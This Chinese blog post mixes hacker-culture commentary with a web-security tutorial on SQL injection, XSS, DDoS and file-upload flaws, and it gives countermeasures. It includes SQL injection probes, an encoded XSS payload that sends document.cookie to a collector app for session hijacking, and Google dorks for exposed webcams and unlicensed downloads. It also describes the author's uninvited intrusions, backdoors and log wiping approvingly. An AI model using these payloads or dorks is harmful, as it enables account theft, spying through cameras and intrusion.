郑重声明:该篇文章未经许可授权不得随意转发除博客园以外的任何地放,园内转发必须注明原文链接地址。文章观点不代表任何团体及组织,实属个人观点,行为!如果触犯法律忘告知及时删除。其它个人如果因本篇文章造成违法犯罪等不正当后果者,本人概不负责。请慎重阅读!上几次有人对这里的声明表示质疑,简单阐述一下,我国互联网办法中明确规定有随意散步不良言论导致后果严重者必惩!文章内容比较敏感,亲,慎重阅读。就凭这一篇文章当然说明不了安全,安全是一个长期的工作,宽泛的领域,我后面想到神马还会添加进来。推荐看看文章提到的两本书。
黑客组织Anonymous" src="/Upload/Images/2013080221/492C929211845195.png" alt="黑客组织Anonymous" width="488" height="264" border="0" />
前几天听见媒体这样报道“美国旧金山的知名黑客巴纳比·杰克(Barnaby Jack)被发现身亡,年仅 35 岁。”首先我们对此表示默哀三分钟!滴滴滴滴,,,,,,,,,,当我听闻的时候不禁大吃一惊,因为前不久我刚刚看过这家伙的杰作那就是挖掘出ATM漏洞可以自动吐钱(视频地址:http://player.youku.com/player.php/sid/XNTg4MjIxNzg4/v.swf)同时这家伙他成功黑掉了多家厂商生产的心脏起搏器,只需十几米之外的一台笔记本电脑,就能让它放出830V的电压,足以致人死地。我立刻想到是不是这些厂商action?但是后来想想,作为黑客都是夜行动物,几乎白天不会做事情!所以他的死也算是一个损失吧。再次默哀!
为什么要讲这个?大家应该对这个新闻都知道了!其实我们就是要引出一个叫白帽黑客的名词,这个不是一个组织,也不是一个团体,应该叫一类人,这些人大多都是网络安全公司效力,专门挖掘系统漏洞,进而改善系统,或者聘请别人来挖掘漏洞,他们来填补。比如google,apple等,每年都会组织黑客大会,来攻破挖掘自己系统或者app的漏洞!进而奖励漏洞发现者,作为回报。
当然上面的只是一类人,并不是所谓的黑客组织,下面我将通过自己的经历及自己了解到的为大家讲述,首先我们需要了解神马事黑客?为神马叫黑客?黑客精神黑客文化,或许这个词你大多都从别的地放了解到,可是我将讲述还原一个真实的事实。废话不多下面开始。
维基百科中是这样讲的:“黑客(英文:Hacker,或称骇客),通常是指对计算机科学、编程和设计方面具高度理解的人”,这样的解释不难理解,当然如果你年龄稍微大点,那或许你不用看这个你就知道,因为早期的黑客确是如此的一类,如果你看过Paul Graham写的《黑客与画家》那你或许会了解到真正意义上的黑客就是顶级程序员+顶级安全攻城师(https://news.ycombinator.com/这个网站就是)。为什么后面也会出现骇客的称谓呢?或许今日的媒体记者在报道的时候标题应该叫“骇客”,而不是XXX黑客,在现在信息爆炸的时代媒体的报道手法为了吸引眼球,不断地层出不群的抹黑黑客这一名词。在国外早起黑客和骇客精神文化相互碰撞产生分歧的时期,我朝的这类人才也已经涌现出来。黑客秉承黑客的文化精神,拯救互联网。而骇客,用于破坏个人计算机窃取个人隐私,破坏互联网为乐。慢慢的人数积累越多,各自都成立了自己的组织,我们叫他黑客组织。而骇客没有自己的精神文化,而慢慢的衰落,直到今日在解释黑客一词的时候百度百科也罢,维基百科也罢都会出现或称骇客,所以这个被埋没的地放。
如果你明白了神马是黑客了?那你就可以跟着我的脚步,一起解密神秘的黑客文化,黑客世界,当然我也会通过自己的故事为大家讲述。首先简单介绍一下笔者知道的所谓的黑客团体(所谓就是忽略正义和非正义)下面列出曾经有一次排名。
德国AllDas.de网站发布了全球排名前25位的黑客组织和个人,共1946个黑客组织和个人参与排名,Silver Lords黑掉864家网站位于榜首,中美黑客大战中臭名昭著的美方黑客组织PoisonBOx位第二,“中国红客联盟”(H.U.C)黑掉126家网站(统计不全),排名第25位,(但由)
1) Silver Lords黑掉864网站,占总数的5.92 %
2) Poizonb0x黑掉629网站,占总数的4.31 %
3) Prime Suspectz黑掉435网站,占总数的2.98 %
4) Hi-Tech Hate黑掉348网站,占总数的2.38 %
5) Unknown黑掉340网站,占总数的2.33 %
6) Demonios黑掉313网站,占总数的2.14 %
7) Hackweiser黑掉277网站,占总数的1.9 %
8) Quit Crew黑掉242网站,占总数的1.66 %
9) WFD黑掉242网站,占总数的1.66 %
10) limit.br黑掉232网站,占总数的1.59 %
11) GForce黑掉206网站,占总数的1.41 %
12) Data Cha0s黑掉166网站,占总数的1.14 %
13) BHS黑掉156网站,占总数的1.07 %
14) WOH黑掉153网站,占总数的1.05 %
15) JNB黑掉152网站,占总数的1.04 %
16) xst黑掉150网站,占总数的1.03 %
17) USDL黑掉149网站,占总数的1.02 %
18) Supreme Entity黑掉148网站,占总数的1.01 %
19) C0BR4S黑掉140网站,占总数的0.96 %
20) fux0r Inc.黑掉140网站,占总数的0.96 %
21) Evil Angelica黑掉135网站,占总数的0.92 %
22) pr0phet黑掉130网站,占总数的0.89 %
23) cr1m3 0rg4n1z4d0黑掉129网站,占总数的0.88 %
24) InfernoZ黑掉128网站,占总数的0.88 %
25) H.U.C黑掉126网站,占总数的0.8%
注:25)H.U.C是中国红客联盟,国内唯一上榜组织。
上面的大多可能在后来的发展中相继流产,下面介绍还有最近比较活跃的。
国外组织:骇客组织Anonymous(前不久攻击过支付网站PayPal,日本街头有组织的对抗政府)现在已知的全球最大的骇客组织,全球最大的政治性黑客组织。文化:宣扬人权,政府透明性组织,自由组织,政治性黑客组织。成员:遍布全世界包括中华台北,中国深圳。
国内组织:中国红客联盟(简称H.U.C)该组织依旧存在,国内现在最具正义感组织,也为国内或者全世界现存宣扬黑客组织精神文化最好的网站(声誉全世界),上面的排名就是其早期与全世界黑客作战排名结果。文化:宣扬黑客正义的力量,为自由,为国家荣誉而战的中国黑客。网站核心思想:道,可道,非常道。名,可名,非常名。成员:高中以上遍布全国(香港,澳门,台湾等地)。有人会问,为什么对该组织很了解,个人在其混了几年时间,包括对黑客的认识均大多来自于此。后面着重分析。
国内组织:白帽子(网站乌云),该组织兴起不久,该组织合作于我国国家信息安全中心,文化:免费嗅探各种互联网漏洞,均以网站为核心提交漏洞.成员:大多为程序猿一族,当然核心人员应该是早起黑客一族。本人蜗居一段时间发现,该组织管理比较混乱,以提交漏洞而提交漏洞,各种浮躁之风。可以称之为社区不能成为真正意义上的黑客组织,因其核心人员名誉,在我朝还算知名。某宝的一名网络安全攻城师也在这里,曾写过一本《白帽子讲 Web 安全》还是比较不错的。
国内组织:更早期有绿盟,也是黑客组织,因其发展不稳定后来改变策略,后来为企业提供安全服务。还有黑白网,也是比较早的骇客组织,该组织发行各种骇客杂志及手册tool.这些都是很早期的,现在境况如何不知其所在。
好了,简单罗列以上个人知道的和有声誉的组织,以上中只有中国红客联盟(H.U.C,下文都将采用H.U.C简称)继承者黑客精神文化,为正义二战斗的一群夜行动物,好吧姑且就叫夜行动物。也是本文通过该组织讲述黑客核心文化的一个极具代表的组织(没有打广告哦!吼吼~~~)
在讲述H.U.C之前,我想讲讲本人的故事,其中会穿插引出H.U.C也就是黑客文化以及个人认识看法。很多人有时候会问一个问题,就是为什么要学编程?又有很多人会说我要当黑客,不错!这个理由貌似充满各种神奇而又神秘的境遇。为神马神秘?神秘的是你可以知道别人不知道的,你可以做到别人不能做到的。以前至少在互联网上你能得知别人所不能知道的消息。我就是因为初中得知黑客一词,高中各种肆无忌惮的跑到学校外面上网,就是为了学习黑客,搞到别人不知道的情报,能在别人面前吹嘘别人不知道的东西!确实很爽(当然现在低调低调再低调,不玩扣扣,不玩微博,不玩微信,不玩智能手机,只玩博客园闪存。)从那以后基本高一高二每周晚上都会出去上网几次,为此我也付出了沉重的代价,翻墙手被玻璃划破鲜血直流,直到现在手指上的疤还在,这样的付出让我很早的就是知道了黑客的意义,黑客的行为,大多晚上活动与互联网的某个角落,学校微机课的时候可以远程关闭掉别人的计算机,当时感觉很爽,可以通过DOS命令发送消息给指定的ip地址,可以动过DOS潜入别人的电脑(当然这些或多或少的大家都玩过,不过仅限xp以前的系统)慢慢的这一切觉得很有意思,每当报纸新闻等爆出XX黑客攻击,等字样,我就要立刻的阅读获取第一手信息(当然这个习惯现在还保留着)
后来接触到一个电子书,大概就是某个黑客写的一个自己的自传,通过这个我了解了很多名词,神马后门,神马蜜糖,神马跳板,神马弱口令,神马sql注入,神马肉鸡,等等让我知道黑客的路很远。不知道哪里看到了一个评论就是说用工具攻击别人的人永远都是工具小子。
后来决定必须了解攻击原理才能理解那些专业术语!所以大家懂了,走上了编程之路。当然那个时候也是比较热爱代码的。慢慢的经过学习,工作,一段时间的积累和在H.U.C有段时间的理解,有了编程功底,理解那些名词很容易懂而且可以知道工具原理是神马了。
其中在这段时间里,个人也友情检测过很多网站,不过大多都是存在sql注入及跨站脚本,很多时候企业都是不注重服务器安全的,至少在我朝是这样,早前这种情况简直不敢直视,漏洞蔓延很厉害,现在好多了!一般通过扫描后台登陆page,注入获取username+password登陆系统修改网站内容, 上传大马(检测网站一般上传页面的脚本木马,通过这样的方式提取更高权限,从而获取webshell远程控制服务器,有人还会留后门方便下次进入,所谓后门就是开启远程控制服务端口,或者将上传的马隐藏的更深以便下次进入。高级黑客还有一个习惯就是每次进入你的电脑就像进入你家一样,先敲门,走的时候记得给自己留后门,还不忘打扫一番,这样不会留下自己的脚印,啥?你不知道?就是删除系统日志。当然还有一部分比较粗暴型的就是直接代理ip)这个时候服务器就是你的了,不高兴了想remove神马就remove神马,当然我一般进去都是看看,观摩一番,不会做更大的动作。骇客攻击服务器的最终目的也是想拿到服务器最高权限。后来也在内网潜入别人的计算机,看看基本不会乱动别人的东西!当然这些基本都是XP系统。自微软windows7以上版本发布,很少有人去探索研发此类软件,而且本身微软的发行速度也是比较快的。导致很少有此平台以上的漏洞(当然这里仅谈攻击个人电脑,比如早前知名的熊猫烧香,灰鸽子都是针对个人及网吧用户)。
当然最近一次,就是内网嗅探过公司用户的个人pc,没做任何事情,发现有四分之一的用户还是xp,而且没设密码、在刚来博客园的时候发现闪存存在XSS漏洞,及时通知dudu,园长大人很快修复。然后就是前几天知名的struts2之Xwork 的ONGL漏洞,我也写了实战演示博文。抓到一大把的struts网站漏洞,有一个网站漏洞百出,直接给停止了!反省反省再上线。
至此个人的故事讲述完毕,当然很多人觉得讲这个是在卖弄,或者跟本文无关,恰巧错了!我不能说自己是黑客,也不能说自己秉承黑客的精神文化,个人觉得黑客文化精神就是这样的,崇尚自由,崇尚不破坏互联网,不破坏个人信息安全,为正义而战,为光荣而战,只为追求世间真理而存在或者说互联网没有绝对安全的钥匙。就像中国有句古话说的好:“没有不透风的墙”。当然有人会觉得我是有点神话了!你错了!
现在我们来讲讲H.U.C,诞生的很早,在互联网的浪潮中也没有淹没,反而而且改版,深受广大爱好黑客精神文化的人员喜爱,为什么它能如此健康的发展?我总结了一下几点:
1.有严格的将惩罚制度,网站人员作风低调,行动高调。
2.定期组织以打击互联网不正之风为活动的扫描拿站活动(打击黄、赌、毒、枪支贩卖,貌似网站8月份又有一次活动)
3,核心成员拥有秉承黑客精神文化。
4.不以利益为目的的存在。
网站发展早期曾经多次与全球骇客抗衡(美国,日本,东南亚各国),这场没有硝烟的战争打到现在,而网站的服务器也多次受到国外骇客攻击,一度瘫痪,关闭!曾经核心成员也都相继各奔东西,但后来通过网站召回不少一直到现在,有句话叫一个男人的成熟就看他经历了多少风雨。我们每次听到国家领土受到威胁的时候都是这些人第一时间发起网络攻击,这一点很符合红盟主旨但不是黑客文化。强调一点,这里不存在政治色彩。现在红盟的发展本着发展祖国网络事业,培养网络英才,增加国人网络安全意识的宗旨。这里不做过多介绍了,也不是本文重点。
如果你读到这里了,你对黑客有所了解了,那我我们开始本文重点所要讲述的内容。着重讲述web方面的安全,至于客户端的安全现在基本很少有人可以的去攻击个人pc,不过会讲讲一些基本的安全常识、服务器级别的安全也不是本文重点,服务器可能涉及的范围更广,需要更专业的安全攻城师、
第一章节:pc端安全
pc端安全,基本涉及到的是个人的pc安全,包括大多数常见的木马都是基于windows xp级别的,就像上文提到的一样,现在windows7及以上的版本很少有,你可能大概会问,为什么这样讲?首先不管黑客骇客,攻击的个人pc的目的就是获取个人资源信息或者出于爱好,而大多数用户都是基于windows下,而windows生命周期最长的一个版本就是xp,而xp的安全性又不是很高,即使填补,也是道高一尺魔高一丈。生命周期长了,让骇客有精力也有时间去研发各类攻击软件。早起我们听说过的熊猫,灰鸽子,都是很强大的远控软件,更高级的功能还具有远程内网穿透功能(神马?你不知道内网穿透?意思就是攻击者通过外网的ip扫描到远程内网段的ip,进而对内网的用户发起攻击)受害最多的或许就是网吧的电脑,很多骇客早起用这玩意,抓取大量肉鸡供自己消遣娱乐!如果你玩游戏(账号被盗后基本都是刷装备,然后到网络黑市交易牟利,当然这类人大多数不懂骇客,而是花钱买工具自学,当然也有一部分人专门做这个!比如曾经我见过一个劲舞团的外挂买到100-200那个时候已经够高了!早期的数据不加密,基本大多都是采用C++编写修改内存欺骗服务器)、扣扣(曾经有一个论坛专门研究扣扣的协议,这下你明白早期你的号码被盗了吧!)等等发现号被盗了,很可能你的机器被人抓鸡了,灰鸽子有自动上线提醒,只要肉鸡上线就能实时监控!可怕吧!
其实这类远控都是有客户端,服务器端,前者就是发送给受害者,后者就是骇客控制端。为什么还能中招?就是因为很多人对系统安全设置不够,当时杀毒基本都是通过文件名来查杀,很多加壳过的,加花代码基本都会绕过杀毒。
安全意识差的用户就会接受黑客发过来的客户端,当然黑客不会傻到直接发exe,当然是一个伪装过的文件,比如:图片文件打开的时候就会远程下载木马客户端到本地,都是影藏掉的。还有就是大多数用户guest用户开启、远程端口开启、弱口令(admin/admin,之类的很容易被人猜解的)通过合法远程登录。然后创建骇客的账号密码以便下次进入,最后远程开启telnet,登录,这个时候你的机器就是人家的了!想干嘛干嘛,即使有杀毒软件,立刻运行net stop 服务器名 ,杀毒软件就死翘翘了!当然你可能猜你的密码较安全?错,骇客有黑客字典,暴力破解。类似于你家门锁了,他会拿很多的钥匙去开门,不巧,成千上万把的钥匙总会有一把会破解。当然还有更可恶点的就是软件捆绑,有些人写的软件里面会捆绑木马安装!还有更厉害的就是研究网络协议,攻击你们家的路由器,拦截数据包,要知道那个时候数据加密很少,大多数消息都是赤裸的传递,骇客很轻易地就能解析数据包(当然现在还有人在做这些,只不过难度很大了,现在的数据都是加密过的!但是也不是不能破解的!)
当互联网各种木马蔓延的时候,杀毒软件乘风波浪的来了,对!就是这个时期,各家杀毒软件为了争宠,相继使出各种的风骚弄姿,确实杜绝了一些木马的运行!但是记得他们的杀毒都是表面的还是不能完全值得用户认可!最后一个时期就是杀毒软件明争暗斗的时期,当然这个事情他们确实下功夫了,建立自己的病毒库,采取扫描内容杀毒,脱壳扫描,直到windows7现在市面上常见的病毒几乎无法正常运行!
骇客到了这个时期几乎淘汰了一大批了,你可能会问为什么?因为这就是一次革新,仅仅会用tool的骇客就没用武之地了,因为几乎没人写这种针对pc端木马!技术高手都相继转移服务器端,因为这个事情也是我朝互联网发展的一大时期,人们渐渐地对互联网有更多的认识,大多的数据都保存在服务器。这个就是接下来我们的重点服务器端安全。
第二章节:服务器安全
服务器顾名思义,就是提供用户服务使用,一般为企业级众多受众范围广,所以服务器的安全是不可忽略的事情。再讲之前我们先讲两个发生在离我们最近的故事,不久之前号称国内知名某某开发者论坛数据库被爆菊花,骇客地下售卖这些几百万的用户信息。最后浮出水面,各大网络下载链接出现。随后就爆出好几个门户(包括网易邮箱)及游戏网站都是如此密码明文保存。各大媒体雪上加霜似的各种头版头条报道,不可否认的是,那个时期我朝的互联网确实还是正发展时期!没有建立更好的安全意识,出现问题依然高姿态的故作镇定!当然现在都改掉了这些坏习惯,基本很小的网站他都知道用MD5加密或者其他加密算法(现在MD5加密也能被破解了,最好的办法就是加点盐,意思就是采用用户名+密码的方式加密,老外用彩虹表跑MD5很轻松的。有些国外骇客还用这个赚钱,跑一个MD5多少刀)。很好,从这个故事中我们可以得出一个结论:戳到他痛处的时候他就知道错了!他就会改的!但是我们仅做好这些就好了嘛?显然不够,我们切不谈服务器本身的安全问题,这里着重讲讲流行的webapp攻击手法,可能或多或少你也了解。然后说说从哪些方面杜绝这些低级错误。加强我们的安全。买了那么多废话,我们该讲讲实用的了,因文章篇幅更多的介绍原理,及防范措施!基本不会演示。
提纲:1、SQL注入攻击。
2、XSS跨站脚本攻击。
3、DDOS攻击。
4、文件上传漏洞。
下面我们通过讲解和例子,来阐述其原理及如何来防范这些现在已经流行的攻击手法。
SQL注入攻击:
这个漏洞想必很多人都知道,而且现在流行的各种开发框架几乎都可以杜绝这种低级错误,当时有些时候可能有些coder自己写的一些sql就可能会忽视。骇客手里的sql注入工具都是成批量的检索漏洞,而且内置了基本常用额字典。这里不做太多讲讲,网上信息一大把,讲讲核心的和注意的地放。
攻击手法:在连接的后缀(比如:http://www.abc.com/news.action?id=1 )加 and 1=1 ,没报错正常访问, ok!然后换and 1=2 如果出现数据库错误,ok这个网站存在注入。要是登陆界面存在1=1那你就可以绕过他的验证!直扑首页了! 如果没有接下来的工作就是 and exists(select * from 表名)各种的揣测,如果不凑巧你的表名被猜中那你数据就被获取了。获取到用户登录表,骇客就可以根据用户名密码登录!但是有一点人一般我们的后台登陆是影藏过的骇客不好找,骇客得到用户密码不知道在哪里登陆?呵呵,这个可是骇客万水千山的第二个难题,不过他们手里一般都有很成熟的批量扫描后台登陆页面的工具,准确率达70%左右,你会说不可能?错了!这些里面也是内置字典,也可以自定义,经过漫长岁月的积累这些字典的命中率极高(到这里想有点题外话,前不久有媒体曝某招聘节目51job被黑客攻击,当然看过节目的都知道,不过我想讲的是那童靴简直就是侮辱我朝黑客的智商,最起码我朝黑客也是在国际上出来名的,他竟然宣称自己找到51job的后台登陆页面,然后大肆的宣扬自己攻击了51job,以至于媒体的标题买点就是51job被黑客攻击,我当时立刻打开节目,结果我听到的是他找到51job的登陆界面!我擦,我当时晕倒啊,真想给这小子一巴掌。有人会说那小子无辜滴,媒体宣扬!不过我看那小子口口声声撕咬不放自己是黑客。好了,拿你没办法!)下面看图,我建了一个测试数据库及表,通过mysql——sql语句演示上面的执行结果会发生神马变化!
《图1.1》
图1.1中第一条sql就是我们一般验证用户sql没什么特别,但是看第二条通过第二天我们得到了该表的数据总数。那么我们如何获得表内容呢?很简单!看下图
《图1.2》
图1.2中我们可以看出数据全部被显示出来。or的意思大家都知道,满足其一就可以!假使我们输入的用户密码完全不存在那也可以查出所有的内容!其实说白了,1=1就是这条sql永远都是true可执行的。
防范措施:当然过滤非法字符(前后台都要过滤,有些前端过滤就是摆设!骇客有浏览器插件立刻绕过你的前端验证!直接无视!),这个指标不治本,上面的那些都是后台拼装sql惹的祸。所以我们最好还是不要拼装sql,现在框架都基本是ORM映射!还可以通过预编译sql来完成(比如:存储过程)
XSS跨站脚本攻击:
这个有些人也玩过,不过这里能我们这次连同cookie盗取一块来演示,也算是这几个里面最有搞头的一个。很多骇客或者取乐的玩家都是发个链接给别人然后异地盗取别人的cookie登陆该用户。当然这个代价有点高,一般需要一个网站来支持你盗取的cookie迁移。所以这里我测试的时候建立发布了两个项目来实现cookie移花接木之术!首先建立了两个项目一个是Test,一个是Demo,Test是一个存在XSS漏洞的网站!Demo是我用来迁移我发给某人一个连接,某人点击后盗取该用户的cookie(当然这个cookie就是该用户登录过该网站)然后我通过盗取的cookie,实现不用输入密码账号自动就能登录被我盗取账号!好了废话不多,开始演习!
准备工作,开始之前为了保证数据的准确性,我都删除了连个浏览器的cookie.如下图:
《图2.1》《图2.2》
接下来要做的就是发布项目,发送XSS跨站连接给我的目标用户,当然这里的目标用户就是我了撒!哈哈!看图讲故事!
先假设某人登陆这个系统如下图:
《图2.3》《图2.4》
图2.3admin上方的输入框就是存在XSS漏洞的、接下来就是我们生成好自己的跨站脚本发出去即可,只要有人点击就ok中招!发到论坛帖子都可以!
http://localhost:8080/Test/Test?username=%3Cscript%3Elocation.href%3D%22http%3A%2F%2Flocalhost%3A8080%2FDemo%2FXSS%3Fid%3D%22%2Bdocument.cookie%3C%2Fscript%3E(等号后面翻译过来就是<script>location.href="XXXX.com?id="+document.cookie</script>手法很多这只是其中之一)
上面的连接就是我的测试加花过的连接,否则别人一眼识破,所以很难中招,我们就需要编码加花!这样欺骗成功撒!
接下来就是观察我的Demo应用也就是迁移cookie用的,看看是不是有人点击了,打印出来了他的cookie.
《图2.5》
上图中当然就是我通过火狐访问上面的连接,然后在Demo应用的控制台打印到的Test应用当前登陆用户的cookie了。接下来就是我们拿到这个cookie干嘛呢?不要着急!我们先用另外的火狐浏览器访问以下Test确保没有登录!
《图2.5》《图2.6》
图2.5.ok木有登陆!然后你是不是看见我的浏览器工具栏有个叫cookies的,不错我们现在就是要用他来填充我们刚刚控制台获取到的Test应用cookie实现登陆!填充如上图图2.6.
《图2.7》《图2.8》
如图2.7所示我填入的就是刚刚Demo控制台打印出来的cookie就是刚刚admin登陆进去的cookie.结果很显然就是上图2.8所示,admin移花接木成功登陆。到这里我们的完整演示完毕!
总结:上面的演示就是XSS真正跨站背后,骇客想要得到神马样的结果,结果就是远程获取用户cookie,实现骇客登陆系统任意执行该用户账号行为(比如:发布消息,修改资料,删除内容等等),当然现在基本浏览器都能拦截跨站攻击,只要你的浏览器没有取消此类设置,我在写演示的时候几乎主流都可以拦截只有火狐完全无视,chrome直接杀死连提示都木有。
防范措施:当然面对上面的问题我们也有解决方案,就是采用httpOnly来阻止javascript来获取或者说访问cookie,以达到保护cookie的目的!这个还不够因为跨站的漏洞还在那里,所以我们需要做的还要消除跨站,过滤非法字符比如:<script></script>这样的标签,还是那句老话,前后台都要过滤,如果你觉得麻烦,后台必须过滤!当然大多数框架也已经有这层过滤了。博客园的闪存也出现过XSS,不过我及时通知dudu修复!而且博客园cookie也是加了httponly的。
对于httponly各个语言都有自己的不同方式这里不贴代码了,自己call大神google吧!好吧,真心写到这里累了!不过继续写完!go on
还是贴一些吧:
java:
一种:response.setHeader("Set-Cookie", "cookiename=value;
Path=/;Domain=domainvalue;Max-Age=seconds;HTTPOnly");一种:
也可以在 web.xml 配置如下:
<session-config><cookie-config>
<http-only>true</http-only>
</cookie-config>
<session-config>
C#:
HttpCookie myCookie = new HttpCookie("myCookie");
myCookie.HttpOnly = true;
Response.AppendCookie(myCookie);
注意各版本不同,也会有区别。
DDOS攻击
DDOS攻击业界洪水攻击,来势汹汹,瞬间毁灭,历史上国外骇客控制肉鸡曾今导致电商网站十几分钟无法访问,损失不言而喻!直到现在DDOS还是很难彻底解决,我们只能通过预防的手段来防止发生!这里也不好做演练简单讲讲!
其实原理就是同一时刻发起大量的http请求,导致服务器阻塞无法及时响应而瘫痪,严重点服务器崩溃!这个类似于网站的吞吐量,前不久博客园的毛病就似乎是这样一口气下去差点上不来!现象是这样,但也不能冒昧的断定就是DDOS,阿里云号称自己能抗这种攻击!不过一般的DDOS量不大还可以!骇客手里都有这种小工具只要输入网址鼠标轻轻一点,选择洪水大小,网站立刻就走上坡路了。
防范措施:这种情况最好首先优化自己的系统整体性能包括数据库性能,性能上去了,吞吐量上去了,然后再考虑配置高点的服务器,这样性能才能调到最佳!还有就是尽可能的采用静态页面!也就是大家常说的网站静态化这样对于抵挡DDOS有很大帮助!最后想说的一点就是凡是用DDOS攻击的都是闲的蛋碎的人弄的事情,记住是闲的蛋碎的人!哈哈!不是蛋疼的人哦!除去友情压力测试的!一般情况下很少有人干这个事情,除非你得罪XXX,骇客一般情况拿它来宣泄政府!
文件上传漏洞:
顾名思义就是文件上传存在漏洞,怎么讲呢?有些时候我们的上传文件验证考虑不全面就会导致被恶意上传文件。这种上传的文件常见的就是前面我们提到的木马文件(有php,jsp,asp,等等)kindeditor我朝的一款富文本编辑器,在上一个版本就发生上传文件漏洞被骇客利用!一度也在互联网引发轩然大波!其实就是上传文件部分验证不够规范,导致可以上传木马文件。
骇客手里有针对各种不同语言而开发的木马文件,俗称大马,小马,大马上传过去就可以获得服务器远程管理权限,通过访问自己上传到你应用的大马实现远程操作服务器。进而穿透C段网络,扫描同段服务器,比如你的应用架在VPS商那里,那么一台服务器可能会涉及很多其他网站,这样就可以通过一个网站渗透更多的网站!然而骇客要想走到这一步现在他需要登陆你的网站后台管理页面,然后找到存在此种漏洞的网页上传!所以显然如果你存在前面的漏洞那你就是为骇客到这一步做铺垫的!显然这是一个连锁反应。
防范,这种就是检查你的上传文件部分,验证要全面,还有就是日志记录,这样以后即使发现问题,你就可以通过日志追踪溯源很容易修改,有些骇客为了让你很难找到上传的文件,就会伪装,所以对你来说维护起来很大麻烦!不定时的检查目录结构!该有的权限设置必须加!
重点内容讲完了,我们再接着讲点其他的一些知识,就是上次有人提到有些网站不能在一段时间内多次评论,这个也算是一种安全策略,包括博客园也有这种策略(博客评论短时间内不能多次评论,闪存不能连续发送5条以上的数据否则不显示)其实这些是早起流行起来的是《论坛灌水机》,原理就是有些人会写一些机器人工具自动刷帖,自动评论的!导致大量的无效数据存在,导致页面显示全是灌水机的。所以在写对外网站论坛类必须重视这个。
接下来我们再讲讲google怎么用,对,就是google怎么用,当然有些人说这有神马会用不会用的,不就是搜索嘛!错了,有种检索的手法正是骇客常用手法,当然一些人应该也知道,知道的就不用看了!骇客常用这种手法来获取攻击目标。即输入:inurl:news.action?id= 亦或者website:baidu.com 简单讲解,前面的那个就是检索google搜索结果url里面以inurl:后面为结尾的网站。后面的检索域名中包含baidu.com的网站。不要小瞧这两个小玩意,很多骇客在用这种手法满河捞鱼。当然news你随意发挥,就比如黑客字典一样,想到的越多或者越切近检索目标就能能找出你想要的。下面我再透漏一点。
在搜索框上输入:“indexof/”inurl:lib
再按搜索你将进入许多图书馆,并且一定能下载自己喜欢的书籍。
在搜索框上输入:“indexof/”cnki
再按搜索你就可以找到许多图书馆的CNKI、VIP、超星等入口!
在搜索框上输入:“indexof/”ppt
再按搜索你就可以突破网站入口下载powerpint作品!
在搜索框上输入:“indexof/”mp3
再按搜索你就可以突破网站入口下载mp3、rm等影视作品!
在搜索框上输入:“indexof/”swf
再按搜索你就可以突破网站入口下载flash作品!
在搜索框上输入:“indexof/”要下载的软件名
再按搜索你就可以突破网站入口下载软件!
注意引号应是英文的!
再透露一下,如果你输入:
“indexof/”AVI
在google里输入
inurl:"viewerframe?mode="
随便打开一个,然后按提示装一个插件,就可以看到了!!!
以上都是福利哦!呵呵呵额。。。。。
全文总结:
好了,啰啰嗦嗦终于完了,我都快受不了了!欧码噶的,大总结不知道写点神马了?这次写的也不够全面,只是片面的一面而已,也是常见的,为什么写?因为很多网站提交的漏洞70%来自以上漏洞。当然还有各种框架漏洞(比如:struts2,记得前几天这个漏洞再次爆出,使用springmvc的高兴了一番,炫耀自己用这个没问题,我想说的是,你错了!springmvc照样有可执行漏洞,只是没有被爆!)有时间了好好整理一番!还有很多没讲到的!包括我们如何来开发一款自己的黑客工具等等!一点要讲的,我们必须清楚没有最安全的只有更安全的!如果不是斯诺登的爆料有几个人关系自己被美利坚合众国偷窥者?没报之前还觉得自己曼妙的舞姿,爆料了,大家这个时候才觉得自己在光着屁股在路上走,各国总统憋不住掩耳盗铃的滋味了,开始嘶吼你丫的太不厚道了吧,背后给我玩阴的!各国媒体更是更是唯恐天下不乱,大肆描画着蓝图!新闻狂轰乱炸!奥先生或许在想,你们把我肿么样?我还是在监听!我们的xi先生笑了,你丫的监控?我们走的是自主研发!最后!我和我的小伙伴们都笑了(此段仅供娱乐)。
善意的忠告:
不要试图作为一名黑客而黑客,黑客的门槛很高,很多人花钱买的一些教程都过时了,骇客做的基本都是xp下做的,要知道微软明年将终结xp baby,不是每一个程序员就能做黑客,黑客有自己的文化、精神、黑客心理学,不吹嘘的讲,黑客的聪明就是程序员的逆向思维!还是那句话,真正的黑客不以攻击为目的。黑客————就是一种信仰!也不要随意的去破坏互联网正常的发展秩序,当然如果你作为一名骇客而活着那您随意,每年国外都有这样空前的骇客盛会!但是我的忠告是如果你继续活在我朝,我朝貌似出台了互联网管理办法,明确会处罚破坏互联网稳定的行为!道,可道,非常道。名,可名,非常名。一切皆尘埃。
ps:如果你没有看过上篇,传送:http://www.cnblogs.com/Beyond-bit/p/XWork_Lead_To_Struts2Bug.html